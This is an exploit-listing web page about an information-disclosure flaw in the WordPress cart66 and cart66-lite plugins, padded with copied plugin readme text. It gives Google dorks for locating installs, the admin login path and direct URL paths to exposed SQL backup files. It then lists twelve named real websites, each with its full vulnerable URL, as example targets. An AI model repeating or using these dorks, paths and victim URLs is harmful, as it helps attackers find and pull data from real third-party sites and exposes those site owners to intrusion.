facebook facebook twitter rss

WordPress cart66 cart66-lite Plugins Database Backup Information Disclosure Vulnerability

Author: KingSkrupellos , Published: 01-12-2018
# Exploit Title : WordPress cart66 cart66-lite Plugins Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/11/2018
# Vendor Homepage : cart66.com ~ wordpress.org/plugins/tags/cart66/ ~ github.com/wp-plugins/cart66-lite
# Software Download Link : github.com/wp-plugins/cart66-lite/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
inurl:''/wp-content/plugins/cart66/''
inurl:''/wp-content/plugins/cart66-lite/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

== Description ==

Sell digital products and/or physical products with Cart66. The easiest to use WordPress ecommerce shopping cart plugin.

Cart66 is a simple to use yet powerful ecommerce plugin for WordPress.

* [Process credit cards securely](http://www.mijireh.com "Secure credit card processing")
using your payment gateway with [Mijireh](http://www.mijireh.com "Secure credit card processing")
* Sell digital products with Amazon S3 integration
* Sell physical products
* Sell services
* Manage orders
* Promotions
* Tax by state (United States and Canada), zip code, or all orders
* Multiple shipping options
* Custom fields for products
* Product variations that can optionally change the price of the product
* Place products on any page or post
* Sell internationally
* Set your currency
* Customizable email receipts
* Affiliate platform integration

=== Cart66 Lite :: WordPress Ecommerce ===
Contributors: reality66
Donate link: cart66.com
Tags: ecommerce, e-commerce, shopping, cart, store, paypal, sell, cart66, products, sales, shopping cart
Requires at least: 2.8.2
Tested up to: 3.6.1
Stable tag: 1.5.1.17
License: GPLv2 or later
License URI: gnu.org/licenses/gpl-2.0.html

=== Cart66 Lite :: WordPress Ecommerce ===
Contributors: reality66
Donate link: cart66.com
Tags: ecommerce, e-commerce, shopping, cart, store, paypal, sell, cart66, products, sales, shopping cart
Requires at least: 3.0
Tested up to: 4.4
Stable tag: 1.5.8
License: GPLv2 or later
License URI: gnu.org/licenses/gpl-2.0.html

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/cart66/sql/database.sql

/wp-content/plugins/cart66/sql/uninstall.sql

/wp-content/plugins/cart66-lite/sql/database.sql

/wp-content/plugins/cart66-lite/sql/uninstall.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] oakridgebikeshop.com/wp-content/plugins/cart66-lite/sql/uninstall.sql

[+] nuchabad.org/wp-content/plugins/cart66/sql/database.sql

[+] petchefct.com/wp-content/plugins/cart66-lite/sql/database.sql

[+] dogtread.com/wp-content/plugins/cart66/sql/database.sql

[+] fowlerlumber.com/wp-content/plugins/cart66/sql/database.sql

[+] chicked.com/wp-content/plugins/cart66/sql/database.sql

[+] domainite.com/wp-content/plugins/cart66/sql/database.sql

[+] thehealersjournal.com/wp-content/plugins/cart66-lite/sql/database.sql

[+] powercore.net/wp-content/plugins/cart66/sql/database.sql

[+] skuff.us/wp-content/plugins/cart66/sql/database.sql

[+] cececlark.com/wp-content/plugins/cart66-lite/sql/database.sql

[+] impactics.com/wp-content/plugins/cart66-lite/sql/database.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :